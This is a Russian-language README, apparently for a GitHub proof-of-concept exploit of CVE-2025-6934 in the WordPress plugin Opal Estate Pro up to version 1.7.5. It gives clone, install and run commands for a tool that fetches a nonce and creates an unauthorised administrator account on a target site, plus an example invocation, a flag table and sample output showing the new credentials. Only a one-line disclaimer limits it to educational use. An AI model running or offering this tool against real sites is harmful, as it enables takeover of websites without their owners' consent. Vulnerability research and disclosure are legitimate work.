
Автоматизированный PoC-эксплойт для WordPress Opal Estate Pro, который обнаруживает уязвимые версии, получает nonce и создает несанкционированные учетные записи администратора.
CVE-2025-6934 — это PoC-эксплойт, нацеленный на WordPress-плагин: Opal Estate Pro ≤ 1.7.5.
Данный эксплойт демонстрирует несанкционированное создание учётной записи администратора.
Дисклеймер: Этот PoC предназначен только для образовательных целей. Не используйте его на системах без разрешения.
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
pip install -r requirements.txt
Требования:
requests,beautifulsoup4,colorama
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>
python3 main.py -u http://site.com/ -mail [email protected] -password 3xplo1tI5Fun -user r1337
| Флаг | Описание | Обязательный | По умолчанию |
|---|---|---|---|
-u, --url | URL целевого сайта | Да | - |
-mail, --newmail | Email для нового админа | Да | - |
-password, --newpassword | Пароль для нового админа | Да | - |
-user, --username | Имя пользователя для админа | Нет | administrator |
Консоль показывает:
[•][✔][✖][i]Пример:
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
Username : r1337
Email : [email protected]
Password : 3xplo1tI5Fun
Role : administrator
Я активный разработчик, который любит создавать инструменты и делиться знаниями. Вы можете связаться со мной через: